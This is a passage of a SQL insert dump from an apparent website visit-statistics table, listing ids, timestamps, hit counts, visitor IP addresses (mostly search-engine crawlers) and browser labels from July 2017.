25,1500898642,2,2,0,0,'216.244.66.194','other'),(136726,1500898770,1,1,0,0,'178.154.171.45','other'),(136727,1500898953,1,1,0,0,'213.180.203.18','other'),(136728,1500899034,1,1,0,0,'91.196.178.67','firefox'),(136729,1500899221,1,1,0,0,'137.74.201.108','other'),(136730,1500899260,1,1,0,0,'51.255.65.61','other'),(136731,1500900402,1,1,0,0,'216.244.66.246','other'),(136732,1500900512,1,0,1,0,'66.249.76.89',''),(136733,1500900513,1,1,0,0,'91.224.68.236','chrome'),(136734,1500900631,1,1,0,0,'95.108.181.60','other'),(136735,1500900817,1,1,0,0,'82.207.120.216','chrome'),(136736,1500900856,1,1,0,0,'77.109.28.186','chrome'),(136737,1500901239,1,1,0,0,'95.108.181.58','other'),(136738,1500901276,1,1,0,0,'151.80.27.116','other'),(136739,1500901284,1,1,0,0,'91.209.11.236','other'),(136740,1500901307,1,0,1,0,'68.180.230.48',''),(136741,1500901369,1,1,0,0,'217.77.220.128','chrome'),(136742,1500901465,1,1,0,0,'91.224.68.236','chrome'),(136743,1500901471,1,1,0,0,'217.182.132.35','other'),(136744,1500901697,1,1,0,0,'51.255.65.50','other'),(136745,1500901878,1,1,0,0,'37.9.113.128','other'),(136746,1500902012,1,1,0,0,'51.255.65.28','other'),(136747,1500902035,1,1,0,0,'54.165.59.7','other'),(136748,1500902279,1,1,0,0,'91.196.178.38','chrome'),(136749,1500902481,2,2,0,0,'178.154.171.18','other'),(136750,1500902577,1,1,0,0,'193.108.50.39','chrome'),(136751,1500902872,1,0,1,0,'66.249.76.89',''),(136752,1500902969,1,1,0,0,'51.255.65.11','other'),(136753,1500902979,2,2,0,0,'91.209.11.236','other'),(136754,1500903049,1,1,0,0,'95.108.181.69','other'),(136755,1500903074,1,0,1,0,'66.249.66.75',''),(136756,1500903076,1,0,1,0,'66.249.66.76',''),(136757,1500903186,1,0,1,0,'66.249.76.137',''),(136758,1500903269,1,1,0,0,'51.255.65.23','other'),(136759,1500903358,1,1,0,0,'46.201.175.91','firefox'),(136760,1500903772,1,1,0,0,'54.165.59.7','other'),(136761,1500903774,1,1,0,0,'95.132.78.9','firefox'),(136762,1500903989,1,1,0,0,'137.74.207.110','other'),(136763,1500904030,1,1,0,0,'180.76.15.25','other'),(136764,1500904086,1,1,0,0,'213.180.203.32','other'),(136765,1500904310,6,6,0,0,'216.244.66.246','other'),(136766,1500904590,1,1,0,0,'95.108.181.63','other'),(136767,1500904600,1,0,1,0,'66.249.66.74',''),(136768,1500904814,1,1,0,0,'5.45.207.66','other'),(136769,1500904922,1,1,0,0,'31.43.8.12','chrome'),(136770,1500905171,1,1,0,0,'180.76.15.140','other'),(136771,1500905511,1,1,0,0,'8.29.198.25','other'),(136772,1500905536,1,1,0,0,'188.166.81.36','chrome'),(136773,1500905593,2,2,0,0,'95.108.181.69','other'),(136774,1500905909,1,1,0,0,'178.154.171.53','other'),(136775,1500906030,1,1,0,0,'180.76.15.135','other'),(136776,1500906221,1,1,0,0,'46.219.6.40','chrome'),(136777,1500906505,1,0,1,0,'66.249.66.75',''),(136778,1500907064,1,1,0,0,'54.165.59.7','other'),(136779,1500907198,1,1,0,0,'5.45.207.56','other'),(136780,1500907512,1,1,0,0,'217.69.143.217','firefox'),(136781,1500907523,1,1,0,0,'91.209.11.236','other'),(136782,1500907540,1,1,0,0,'176.83.237.247','chrome'),(136783,1500907554,1,1,0,0,'37.9.113.138','other'),(136784,1500908056,1,1,0,0,'176.83.237.247','other'),(136785,1500908114,1,1,0,0,'90.174.3.123','chrome'),(136786,1500908358,8,8,0,0,'216.244.66.246','other'),(136787,1500908372,1,1,0,0,'213.180.203.42','other'),(136788,1500908469,1,1,0,0,'66.249.76.137','chrome'),(136789,1500908706,1,1,0,0,'217.182.132.179','other'),(136790,1500908763,1,1,0,0,'176.83.237.247','chrome'),(136791,1500909151,4,4,0,0,'216.244.66.194','other'),(136792,1500909424,1,1,0,0,'217.182.132.34','other'),(136793,1500909462,1,1,0,0,'217.182.132.192','other'),(136794,1500909582,1,1,0,0,'91.196.178.40','chrome'),(136795,1500909669,1,1,0,0,'213.180.203.43','other'),(136796,1500909990,1,1,0,0,'217.69.133.6','other'),(136797,1500910070,1,1,0,0,'176.83.237.247','chrome'),(136798,1500910235,1,1,0,0,'217.182.132.96','other'),(136799,1500910470,1,1,0,0,'5.45.207.66','other'),(136800,1500910681,1,1,0,0,'95.158.2.60','chrome'),(136801,1500910881,1,1,0,0,'164.132.162.155','other'),(136802,1500910917,1,1,0,0,'178.154.171.42','other'),(136803,1500911403,2,2,0,0,'216.244.66.194','other'),(136804,1500911429,1,1,0,0,'37.9.113.78','other'),(136805,1500911643,1,1,0,0,'217.182.132.175','other'),(136806,1500911802,1,1,0,0,'5.45.207.57','other'),(136807,1500911833,1,1,0,0,'51.255.71.120','other'),(136808,1500912084,1,1,0,0,'213.180.203.42','other'),(136809,1500912617,1,1,0,0,'217.182.132.70','other'),(136810,1500912811,1,1,0,0,'5.45.207.66','other'),(136811,1500913507,1,1,0,0,'40.77.167.42','other'),(136812,1500913630,1,1,0,0,'46.219.241.207','other'),(136813,1500914075,1,1,0,0,'5.45.207.64','other'),(136814,1500914099,1,1,0,0,'5.45.207.66','other'),(136815,1500914858,1,1,0,0,'5.45.207.57','other'),(136816,1500914893,3,3,0,0,'91.209.11.236','other'),(136817,1500915098,1,1,0,0,'95.108.181.69','other'),(136818,1500915205,2,2,0,0,'213.180.203.14','other'),(136819,1500915208,1,1,0,0,'51.255.65.48','other'),(136820,1500915228,1,1,0,0,'66.102.9.25','chrome'),(136821,1500915870,1,0,1,0,'66.249.76.93',''),(136822,1500915925,1,1,0,0,'213.180.203.32','other'),(136823,1500915954,1,1,0,0,'178.154.171.53','other'),(136824,1500916155,1,1,0,0,'217.182.132.193','other'),(136825,1500916373,1,1,0,0,'8.29.198.26','other'),(136826,1500916517,1,1,0,0,'217.182.132.59','other'),(136827,1500916968,1,0,1,0,'66.249.66.76',''),(136828,1500916996,1,0,1,0,'66.249.66.74',''),(136829,1500917402,4,4,0,0,'46.229.168.78','other'),(136830,1500917408,2,2,0,0,'46.229.168.72','other'),(136831,1500917429,8,8,0,0,'46.229.168.66','other'),(136832,1500917462,9,9,0,0,'46.229.168.80','other'),(136833,1500917480,3,3,0,0,'46.229.168.73','other'),(136834,1500917498,3,3,0,0,'46.229.168.65','other'),(136835,1500917516,5,5,0,0,'46.229.168.69','other'),(136836,1500917534,3,3,0,0,'46.229.168.79','other'),(136837,1500917553,2,2,0,0,'46.229.168.70','other'),(136838,1500917606,4,4,0,0,'46.229.168.76','other'),(136839,1500917751,2,2,0,0,'46.229.168.67','other'),(136840,1500917796,5,5,0,0,'46.229.168.77','other'),(136841,1500917823,2,2,0,0,'46.229.168.68','other'),(136842,1500917914,2,2,0,0,'46.229.168.74','other'),(136843,1500918158,3,3,0,0,'46.229.168.75','other'),(136844,1500918237,2,2,0,0,'46.229.168.71','other'),(136845,1500918359,4,4,0,0,'46.229.168.66','other'),(136846,1500918372,5,5,0,0,'46.229.168.78','other'),(136847,1500918405,8,8,0,0,'46.229.168.80','other'),(136848,1500918423,2,2,0,0,'46.229.168.65','other'),(136849,1500918459,1,1,0,0,'46.229.168.70','other'),(136850,1500918536,7,7,0,0,'46.229.168.79','other'),(136851,1500918549,1,1,0,0,'46.229.168.72','other'),(136852,1500918585,3,3,0,0,'46.229.168.73','other'),(136853,1500918703,3,3,0,0,'46.229.168.77','other'),(136854,1500918767,4,4,0,0,'46.229.168.69','other'),(136855,1500918834,1,1,0,0,'157.55.39.93','other'),(136856,1500918841,3,3,0,0,'46.229.168.67','other'),(136857,1500919028,6,6,0,0,'216.244.66.246','other'),(136858,1500919041,2,2,0,0,'46.229.168.74','other'),(136859,1500919185,1,1,0,0,'46.229.168.68','other'),(136860,1500919203,1,1,0,0,'46.229.168.76','other'),(136861,1500919691,1,1,0,0,'178.154.171.18','other'),(136862,1500920148,1,1,0,0,'217.182.132.61','other'),(136863,1500920356,1,1,0,0,'51.255.65.65','other'),(136864,1500920536,3,3,0,0,'216.244.66.194','other'),(136865,1500920577,1,1,0,0,'178.154.171.3','other'),(136866,1500920941,1,1,0,0,'95.108.181.69','other'),(136867,1500921241,1,1,0,0,'217.182.132.153','other'),(136868,1500921279,1,1,0,0,'217.182.132.181','other'),(136869,1500921437,2,2,0,0,'54.165.59.7','other'),(136870,1500921516,1,0,1,0,'66.249.66.75',''),(136871,1500921852,1,1,0,0,'178.154.171.18','other'),(136872,1500921866,1,1,0,0,'95.108.181.52','other'),(136873,1500921930,1,1,0,0,'217.182.132.68','other'),(136874,1500921962,2,2,0,0,'5.45.207.83','other'),(136875,1500922032,1,1,0,0,'213.180.203.32','other'),(136876,1500922129,7,7,0,0,'216.244.66.194','other'),(136877,1500922438,1,1,0,0,'213.180.203.25','other'),(136878,1500922487,1,1,0,0,'91.209.11.236','other'),(136879,1500922997,1,1,0,0,'178.154.171.18','other'),(136880,1500923173,1,1,0,0,'5.45.207.64','other'),(136881,1500923349,1,1,0,0,'5.45.207.66','other'),(136882,1500923420,1,1,0,0,'137.74.207.159','other'),(136883,1500923459,2,2,0,0,'213.180.203.42','other'),(136884,1500924011,1,1,0,0,'51.255.71.123','other'),(136885,1500924039,1,1,0,0,'217.182.132.185','other'),(136886,1500924249,1,1,0,0,'91.196.178.167','chrome'),(136887,1500924292,1,1,0,0,'91.209.11.236','other'),(136888,1500924812,1,1,0,0,'176.15.225.161','msie'),(136889,1500924959,1,1,0,0,'46.173.70.7','other'),(136890,1500925086,1,0,1,0,'66.249.76.89',''),(136891,1500925110,1,1,0,0,'37.9.113.128','other'),(136892,1500925115,1,0,1,0,'66.249.76.91',''),(136893,1500925126,1,0,1,0,'66.249.76.131',''),(136894,1500925269,1,1,0,0,'51.255.65.64','other'),(136895,1500925449,1,1,0,0,'151.80.27.118','other'),(136896,1500925567,1,1,0,0,'91.209.11.236','other'),(136897,1500925916,1,1,0,0,'40.77.167.123','other'),(136898,1500926875,1,1,0,0,'157.55.39.93','other'),(136899,1500926883,1,1,0,0,'5.45.207.56','other'),(136900,1500927071,1,1,0,0,'213.180.203.14','other'),(136901,1500927210,1,1,0,0,'8.29.198.26','other'),(136902,1500927321,1,1,0,0,'217.182.132.72','other'),(136903,1500927387,1,0,1,0,'66.249.66.76',''),(136904,1500927712,1,1,0,0,'217.69.133.9','other'),(136905,1500927909,1,1,0,0,'51.255.65.5','other'),(136906,1500927911,1,1,0,0,'37.9.113.138','other'),(136907,1500927947,1,1,0,0,'51.255.65.35','other'),(136908,1500928322,1,1,0,0,'213.180.203.21','other'),(136909,1500928355,1,1,0,0,'178.154.171.59','other'),(136910,1500928482,1,1,0,0,'178.154.171.18','other'),(136911,1500928645,1,0,1,0,'66.249.76.71',''),(136912,1500928701,1,1,0,0,'5.45.207.56','other'),(136913,1500929505,1,0,1,0,'66.249.76.67',''),(136914,1500929744,3,3,0,0,'216.244.66.246','other'),(136915,1500929935,1,1,0,0,'51.255.71.112','other'),(136916,1500930051,1,1,0,0,'217.182.132.15','other'),(136917,1500930181,1,1,0,0,'216.244.66.194','other'),(136918,1500930504,1,1,0,0,'95.108.181.69','other'),(136919,1500930723,1,0,1,0,'66.249.66.74',''),(136920,1500930788,1,1,0,0,'217.182.132.188','other'),(136921,1500930898,1,0,1,0,'66.249.66.76',''),(136922,1500930913,1,0,1,0,'66.249.76.89',''),(136923,1500931478,1,1,0,0,'51.255.65.43','other'),(136924,1500931712,1,1,0,0,'51.255.65.24','other'),(136925,1500931808,1,1,0,0,'95.108.181.58','other'),(136926,1500932142,1,1,0,0,'217.182.132.179','other'),(136927,1500932502,1,1,0,0,'95.108.181.60','other'),(136928,1500932519,4,4,0,0,'216.244.66.194','other'),(136929,1500932776,1,1,0,0,'91.209.11.236','other'),(136930,1500933023,1,1,0,0,'217.182.132.50','other'),(136931,1500933121,1,1,0,0,'95.108.181.58','other'),(136932,1500933344,1,1,0,0,'164.132.162.188','other'),(136933,1500933355,1,1,0,0,'95.108.181.69','other'),(136934,1500933653,1,1,0,0,'178.154.171.53','other'),(136935,1500933730,1,1,0,0,'217.182.132.24','other'),(136936,1500934645,1,1,0,0,'91.209.11.236','other'),(136937,1500934918,1,1,0,0,'66.249.76.131','chrome'),(136938,1500934934,1,1,0,0,'51.255.71.121','other'),(136939,1500935256,2,2,0,0,'216.244.66.246','other'),(136940,1500935687,1,1,0,0,'157.55.39.93','other'),(136941,1500935912,1,1,0,0,'51.255.65.12','other'),(136942,1500936008,64,64,0,0,'64.140.169.42','firefox'),(136943,1500936056,1,1,0,0,'51.255.65.58','other'),(136944,1500936436,1,1,0,0,'51.255.71.112','other'),(136945,1500937125,1,1,0,0,'178.154.171.18','other'),(136946,1500937210,1,1,0,0,'95.108.181.52','other'),(136947,1500937483,1,1,0,0,'51.255.65.45','other'),(136948,1500937484,1,1,0,0,'216.244.66.194','other'),(136949,1500937705,1,0,1,0,'66.249.66.74',''),(136950,1500937861,1,1,0,0,'178.154.171.53','other'),(136951,1500938051,1,1,0,0,'8.29.198.25','other'),(136952,1500938071,1,0,1,0,'66.249.66.155',''),(136953,1500938246,1,1,0,0,'164.132.162.154','other'),(136954,1500938515,1,1,0,0,'178.154.171.59','other'),(136955,1500938530,1,1,0,0,'91.209.11.236','other'),(136956,1500938609,1,1,0,0,'217.182.132.146','other'),(136957,1500939391,1,1,0,0,'95.108.181.63','other'),(136958,1500939554,1,1,0,0,'95.108.181.58','other'),(136959,1500939657,1,1,0,0,'178.154.171.59','other'),(136960,1500939831,4,4,0,0,'216.244.66.194','other'),(136961,1500939988,1,1,0,0,'213.180.203.42','other'),(136962,1500940149,4,4,0,0,'216.244.66.246','other'),(136963,1500940824,1,1,0,0,'51.255.65.28','other'),(136964,1500940861,1,1,0,0,'51.255.71.123','other'),(136965,1500941281,1,1,0,0,'213.180.203.25','other'),(136966,1500941345,1,0,1,0,'66.249.66.76',''),(136967,1500941562,1,1,0,0,'180.76.15.5','other'),(136968,1500941608,1,1,0,0,'51.255.65.49','other'),(136969,1500941776,1,1,0,0,'37.9.113.138','other'),(136970,1500941954,1,1,0,0,'51.255.65.78','other'),(136971,1500943243,1,1,0,0,'51.255.65.36','other'),(136972,1500943455,1,1,0,0,'216.244.66.246','other'),(136973,1500943505,1,1,0,0,'217.69.133.2','other'),(136974,1500943705,1,1,0,0,'178.154.171.3','other'),(136975,1500943814,1,1,0,0,'5.45.207.57','other'),(136976,1500944026,1,0,1,0,'66.249.76.89',''),(136977,1500944041,1,0,1,0,'66.249.66.76',''),(136978,1500944143,1,1,0,0,'91.209.11.236','other'),(136979,1500944170,1,1,0,0,'217.182.132.63','other'),(136980,1500944544,1,1,0,0,'217.69.133.4','other'),(136981,1500944673,1,1,0,0,'217.182.132.83','other'),(136982,1500944804,1,1,0,0,'217.182.132.173','other'),(136983,1500945208,1,1,0,0,'178.154.171.53','other'),(136984,1500945511,1,1,0,0,'91.209.11.236','other'),(136985,1500946074,1,1,0,0,'51.255.65.32','other'),(136986,1500946654,1,1,0,0,'217.182.132.90','other'),(136987,1500946727,1,1,0,0,'217.182.132.28','other'),(136988,1500946730,6,6,0,0,'216.244.66.194','other'),(136989,1500946921,1,1,0,0,'157.55.39.93','other'),(136990,1500946993,1,1,0,0,'95.108.181.63','other'),(136991,1500947116,1,1,0,0,'5.45.207.83','other'),(136992,1500947392,5,5,0,0,'216.244.66.246','other'),(136993,1500947574,1,0,1,0,'66.249.76.89',''),(136994,1500947787,1,1,0,0,'164.132.162.156','other'),(136995,1500948020,1,1,0,0,'217.182.132.157','other'),(136996,1500948894,1,1,0,0,'8.29.198.26','other'),(136997,1500948929,1,1,0,0,'91.209.11.236','other'),(136998,1500949168,1,1,0,0,'51.255.65.13','other'),(136999,1500949688,1,0,1,0,'66.249.76.137',''),(137000,1500949758,4,4,0,0,'216.244.66.194','other'),(137001,1500949861,1,1,0,0,'51.255.65.60','other'),(137002,1500950120,1,1,0,0,'51.255.65.87','other'),(137003,1500950343,1,1,0,0,'95.108.181.52','other'),(137004,1500950423,1,1,0,0,'5.45.207.66','other'),(137005,1500950700,1,1,0,0,'157.55.39.93','other'),(137006,1500950731,1,1,0,0,'213.180.203.42','other'),(137007,1500951003,2,2,0,0,'216.244.66.246','other'),(137008,1500951389,1,1,0,0,'164.132.162.153','other'),(137009,1500952184,1,1,0,0,'51.255.65.4','other'),(137010,1500952190,1,1,0,0,'95.108.181.69','other'),(137011,1500952432,1,1,0,0,'217.182.132.21','other'),(137012,1500952544,2,2,0,0,'178.154.171.3','other'),(137013,1500952926,1,1,0,0,'37.9.113.94','other'),(137014,1500952941,1,1,0,0,'217.182.132.97','other'),(137015,1500953098,1,0,1,0,'66.249.76.131',''),(137016,1500953249,1,1,0,0,'217.182.132.82','other'),(137017,1500953520,1,1,0,0,'91.209.11.236','other'),(137018,1500953647,1,1,0,0,'40.77.167.123','other'),(137019,1500953888,1,1,0,0,'51.255.65.77','other'),(137020,1500954083,1,1,0,0,'37.9.113.128','other'),(137021,1500954153,1,1,0,0,'51.255.65.62','other'),(137022,1500954178,1,1,0,0,'40.77.167.42','other'),(137023,1500954345,1,1,0,0,'51.255.71.100','other'),(137024,1500954432,1,0,1,0,'66.249.76.137',''),(137025,1500954756,1,1,0,0,'51.255.64.106','other'),(137026,1500955701,1,1,0,0,'95.108.181.52','other'),(137027,1500956053,1,1,0,0,'217.182.132.87','other'),(137028,1500957034,2,2,0,0,'95.108.181.63','other'),(137029,1500957298,1,1,0,0,'5.45.207.83','other'),(137030,1500957492,1,1,0,0,'91.209.11.236','other'),(137031,1500957501,1,0,1,0,'66.249.66.157',''),(137032,1500957550,1,1,0,0,'217.182.132.172','other'),(137033,1500957613,6,6,0,0,'216.244.66.246','other'),(137034,1500957676,1,1,0,0,'51.255.65.63','other'),(137035,1500957747,1,1,0,0,'37.9.113.78','other'),(137036,1500958022,1,1,0,0,'91.196.178.70','firefox'),(137037,1500958760,1,1,0,0,'51.255.71.130','other'),(137038,1500958883,1,0,1,0,'66.249.76.93',''),(137039,1500958892,1,0,1,0,'66.249.76.91',''),(137040,1500958902,1,1,0,0,'51.255.65.83','other'),(137041,1500958910,1,0,1,0,'66.249.76.89',''),(137042,1500959103,1,1,0,0,'5.45.207.83','other'),(137043,1500959380,1,1,0,0,'217.69.133.4','other'),(137044,1500959540,1,1,0,0,'217.182.132.96','other'),(137045,1500959743,1,1,0,0,'8.29.198.25','other'),(137046,1500959968,1,1,0,0,'213.180.203.25','other'),(137047,1500960009,1,1,0,0,'5.45.207.64','other'),(137048,1500960191,1,1,0,0,'51.255.65.36','other'),(137049,1500960328,1,1,0,0,'178.154.171.53','other'),(137050,1500960475,1,1,0,0,'217.69.133.5','other'),(137051,1500960478,1,1,0,0,'217.182.132.21','other'),(137052,1500960527,1,1,0,0,'91.196.178.68','chrome'),(137053,1500960802,1,0,1,0,'66.249.76.89',''),(137054,1500960815,3,3,0,0,'216.244.66.246','other'),(137055,1500960980,3,3,0,0,'216.244.66.194','other'),(137056,1500961175,1,1,0,0,'51.255.65.13','other'),(137057,1500961391,1,1,0,0,'217.69.133.9','other'),(137058,1500962048,1,1,0,0,'213.180.203.14','other'),(137059,1500962188,1,1,0,0,'95.108.181.60','other'),(137060,1500962197,1,1,0,0,'37.55.30.5','chrome'),(137061,1500962266,1,1,0,0,'91.209.11.236','other'),(137062,1500962471,1,1,0,0,'217.182.132.65','other'),(137063,1500962515,1,1,0,0,'217.182.132.34','other'),(137064,1500962878,1,1,0,0,'95.108.181.52','other'),(137065,1500963622,1,1,0,0,'91.222.16.18','other'),(137066,1500963665,1,1,0,0,'213.180.203.21','other'),(137067,1500963826,1,1,0,0,'213.180.203.18','other'),(137068,1500963997,1,1,0,0,'217.182.132.88','other'),(137069,1500964044,1,1,0,0,'51.255.65.4','other'),(137070,1500964322,1,1,0,0,'195.16.76.240','chrome'),(137071,1500964388,1,1,0,0,'217.182.132.191','other'),(137072,1500964420,1,1,0,0,'217.182.132.28','other'),(137073,1500964657,1,1,0,0,'217.182.132.95','other'),(137074,1500965121,1,1,0,0,'91.211.135.230','chrome'),(137075,1500965556,1,1,0,0,'217.182.132.55','other'),(137076,1500965961,1,1,0,0,'193.93.184.171','chrome'),(137077,1500966305,1,1,0,0,'217.182.132.79','other'),(137078,1500966509,2,0,2,0,'66.249.66.75',''),(137079,1500966701,1,1,0,0,'195.69.221.54','chrome'),(137080,1500966736,1,1,0,0,'66.249.66.156','chrome'),(137081,1500966749,1,1,0,0,'51.255.65.88','other'),(137082,1500966991,1,1,0,0,'217.69.133.203','other'),(137083,1500967006,1,0,1,0,'68.180.230.48',''),(137084,1500967891,4,4,0,0,'216.244.66.246','other'),(137085,1500968819,1,1,0,0,'217.182.132.181','other'),(137086,1500969160,1,1,0,0,'66.249.66.76','chrome'),(137087,1500969453,2,2,0,0,'142.54.166.218','msie'),(137088,1500969621,1,1,0,0,'213.180.203.42','other'),(137089,1500969622,2,2,0,0,'91.196.178.71','chrome'),(137090,1500969921,1,1,0,0,'137.74.201.99','other'),(137091,1500970068,1,1,0,0,'37.9.113.78','other'),(137092,1500970197,1,1,0,0,'51.255.65.20','other'),(137093,1500970303,1,1,0,0,'180.76.15.18','other'),(137094,1500970572,1,1,0,0,'217.69.133.194','other'),(137095,1500970580,1,1,0,0,'8.29.198.25','other'),(137096,1500970687,1,1,0,0,'164.132.162.159','other'),(137097,1500970738,1,1,0,0,'51.255.65.77','other'),(137098,1500970988,1,1,0,0,'51.255.65.87','other'),(137099,1500971004,1,1,0,0,'40.77.167.123','other'),(137100,1500971125,1,1,0,0,'5.45.207.56','other'),(137101,1500971156,1,1,0,0,'195.64.190.1','chrome'),(137102,1500971788,4,4,0,0,'216.244.66.194','other'),(137103,1500971813,1,0,1,0,'66.249.76.93',''),(137104,1500971953,1,1,0,0,'51.255.71.101','other'),(137105,1500972315,3,3,0,0,'216.244.66.246','other'),(137106,1500972660,2,2,0,0,'37.73.196.189','chrome'),(137107,1500972719,1,1,0,0,'178.154.171.45','other'),(137108,1500972868,1,1,0,0,'217.182.132.183','other'),(137109,1500972974,1,1,0,0,'78.27.185.36','chrome'),(137110,1500973261,1,1,0,0,'91.230.198.34','chrome'),(137111,1500973271,1,1,0,0,'91.196.178.68','firefox'),(137112,1500973647,1,1,0,0,'213.180.203.25','other'),(137113,1500973855,1,1,0,0,'141.0.12.234','opera'),(137114,1500974088,1,1,0,0,'94.45.135.106','chrome'),(137115,1500974298,1,1,0,0,'91.196.178.68','firefox'),(137116,1500975501,4,4,0,0,'216.244.66.194','other'),(137117,1500975791,1,1,0,0,'91.196.178.67','chrome'),(137118,1500975910,1,1,0,0,'134.249.146.215','chrome'),(137119,1500976011,1,1,0,0,'213.180.203.14','other'),(137120,1500976096,6,6,0,0,'82.193.100.107','other'),(137121,1500976158,1,1,0,0,'217.69.133.6','other'),(137122,1500976451,1,1,0,0,'91.196.178.71','firefox'),(137123,1500976764,1,1,0,0,'107.21.1.8','other'),(137124,1500976767,1,1,0,0,'46.201.175.91','firefox'),(137125,1500976970,1,1,0,0,'95.108.181.69','other'),(137126,1500976986,1,1,0,0,'176.195.175.28','chrome'),(137127,1500976995,1,1,0,0,'178.92.84.113','chrome'),(137128,1500977333,1,1,0,0,'91.196.178.68','firefox'),(137129,1500977562,1,1,0,0,'51.255.71.122','other'),(137130,1500977913,1,0,1,0,'66.249.66.156',''),(137131,1500977914,1,0,1,0,'66.249.76.89',''),(137132,1500978373,1,1,0,0,'37.53.184.61','chrome'),(137133,1500978874,1,1,0,0,'213.180.203.14','other'),(137134,1500979096,1,1,0,0,'51.255.65.94','other'),(137135,1500979113,3,3,0,0,'216.244.66.246','other'),(137136,1500979206,1,0,1,0,'66.249.66.156',''),(137137,1500979820,1,1,0,0,'188.32.238.174','msie'),(137138,1500980322,1,1,0,0,'40.77.167.84','other'),(137139,1500980446,1,1,0,0,'95.158.3.62','chrome'),(137140,1500980724,1,1,0,0,'178.154.171.42','other'),(137141,1500980728,1,1,0,0,'213.180.203.32','other'),(137142,1500981052,1,1,0,0,'213.180.203.42','other'),(137143,1500981306,1,1,0,0,'5.45.207.64','other'),(137144,1500981332,1,1,0,0,'95.108.181.57','other'),(137145,1500981415,6,6,0,0,'216.244.66.194','other'),(137146,1500981438,1,1,0,0,'91.209.11.236','other'),(137147,1500981449,1,1,0,0,'8.29.198.25','other'),(137148,1500981511,1,1,0,0,'212.90.63.75','chrome'),(137149,1500981533,1,1,0,0,'82.117.225.239','firefox'),(137150,1500981680,1,0,1,0,'66.249.66.73',''),(137151,1500981739,1,1,0,0,'178.154.171.53','other'),(137152,1500981762,1,1,0,0,'217.69.133.5','other'),(137153,1500981798,1,1,0,0,'178.154.171.18','other'),(137154,1500982005,1,1,0,0,'91.196.178.67','firefox'),(137155,1500982182,1,1,0,0,'66.249.93.89','chrome'),(137156,1500982268,1,1,0,0,'46.201.175.91','firefox'),(137157,1500982339,1,1,0,0,'157.55.39.93','other'),(137158,1500982489,1,1,0,0,'178.154.171.59','other'),(137159,1500982527,1,1,0,0,'176.122.100.52','chrome'),(137160,1500982559,1,1,0,0,'94.45.135.106','chrome'),(137161,1500982674,2,2,0,0,'216.244.66.246','other'),(137162,1500982680,1,1,0,0,'213.180.203.32','other'),(137163,1500982948,1,1,0,0,'213.180.203.18','other'),(137164,1500983490,1,1,0,0,'157.55.39.93','other'),(137165,1500983815,1,1,0,0,'95.108.181.63','other'),(137166,1500984084,1,1,0,0,'213.180.203.18','other'),(137167,1500984170,1,1,0,0,'91.209.11.236','other'),(137168,1500984284,1,1,0,0,'46.33.253.130','firefox'),(137169,1500985157,3,3,0,0,'216.244.66.194','other'),(137170,1500985301,1,1,0,0,'37.9.113.94','other'),(137171,1500986098,1,1,0,0,'5.45.207.56','other'),(137172,1500986213,1,1,0,0,'66.249.66.74','chrome'),(137173,1500986808,1,1,0,0,'91.196.178.129','chrome'),(137174,1500986931,1,1,0,0,'213.180.203.42','other'),(137175,1500987196,1,1,0,0,'213.180.203.21','other'),(137176,1500987847,1,1,0,0,'178.154.171.3','other'),(137177,1500988794,1,0,1,0,'66.249.76.93',''),(137178,1500988816,1,1,0,0,'178.154.171.53','other'),(137179,1500988919,1,1,0,0,'5.45.207.57','other'),(137180,1500989517,1,1,0,0,'217.69.133.4','other'),(137181,1500989589,1,1,0,0,'91.209.11.236','other'),(137182,1500989668,1,1,0,0,'91.196.178.71','firefox'),(137183,1500990077,1,1,0,0,'40.77.167.123','other'),(137184,1500990407,2,2,0,0,'95.132.38.24','chrome'),(137185,1500990441,1,1,0,0,'178.154.171.59','other'),(137186,1500990590,1,1,0,0,'37.9.113.78','other'),(137187,1500990931,1,1,0,0,'91.209.11.236','other'),(137188,1500991079,1,0,1,0,'66.249.76.93',''),(137189,1500991086,1,0,1,0,'66.249.76.89',''),(137190,1500991293,1,1,0,0,'95.108.181.63','other'),(137191,1500991302,2,2,0,0,'213.180.203.14','other'),(137192,1500991318,4,4,0,0,'216.244.66.246','other'),(137193,1500991659,1,1,0,0,'95.108.181.52','other'),(137194,1500991680,1,1,0,0,'46.201.175.91','firefox'),(137195,1500991797,8,8,0,0,'216.244.66.194','other'),(137196,1500992306,1,1,0,0,'8.29.198.25','other'),(137197,1500992426,1,1,0,0,'5.45.207.64','other'),(137198,1500992548,1,1,0,0,'37.55.203.69','chrome'),(137199,1500992682,1,1,0,0,'66.249.76.93','chrome'),(137200,1500993440,1,1,0,0,'95.108.181.58','other'),(137201,1500993961,1,1,0,0,'180.76.15.27','other'),(137202,1500994063,1,1,0,0,'91.209.11.236','other'),(137203,1500994155,1,1,0,0,'180.76.15.135','other'),(137204,1500994475,4,4,0,0,'216.244.66.246','other'),(137205,1500994504,1,0,1,0,'66.249.66.74',''),(137206,1500994511,1,0,1,0,'66.249.76.89',''),(137207,1500995556,1,1,0,0,'213.180.203.25','other'),(137208,1500995620,1,1,0,0,'5.45.207.56','other'),(137209,1500995961,1,1,0,0,'180.76.15.14','other'),(137210,1500996199,1,1,0,0,'213.180.203.32','other'),(137211,1500996329,1,1,0,0,'213.180.203.18','other'),(137212,1500997366,1,1,0,0,'95.108.181.69','other'),(137213,1500997436,1,1,0,0,'178.154.171.3','other'),(137214,1500997499,1,0,1,0,'66.249.66.156',''),(137215,1500998037,1,0,1,0,'66.249.76.93',''),(137216,1500998469,1,1,0,0,'40.77.167.123','other'),(137217,1500998925,2,2,0,0,'91.209.11.236','other'),(137218,1501000070,1,1,0,0,'178.154.171.59','other'),(137219,1501000170,1,1,0,0,'66.249.66.155','chrome'),(137220,1501000308,2,0,2,0,'66.249.76.89',''),(137221,1501000330,1,1,0,0,'91.209.11.236','other'),(137222,1501000712,1,1,0,0,'217.69.133.5','other'),(137223,1501000831,7,7,0,0,'216.244.66.246','other'),(137224,1501000963,1,1,0,0,'66.249.66.74','chrome'),(137225,1501001379,1,1,0,0,'216.244.66.194','other'),(137226,1501002011,1,1,0,0,'66.249.66.156','chrome'),(137227,1501002198,1,1,0,0,'40.77.167.84','other'),(137228,1501002598,1,1,0,0,'91.209.11.236','other'),(137229,1501003158,1,1,0,0,'8.29.198.26','other'),(137230,1501003203,1,1,0,0,'40.77.167.42','other'),(137231,1501003736,1,1,0,0,'91.209.11.236','other'),(137232,1501004281,1,1,0,0,'178.154.171.59','other'),(137233,1501004397,1,1,0,0,'216.244.66.246','other'),(137234,1501005541,1,1,0,0,'46.211.248.13','chrome'),(137235,1501005559,9,9,0,0,'216.244.66.194','other'),(137236,1501005847,1,0,1,0,'66.249.66.76',''),(137237,1501005854,1,0,1,0,'66.249.76.91',''),(137238,1501005866,1,1,0,0,'5.45.207.66','other'),(137239,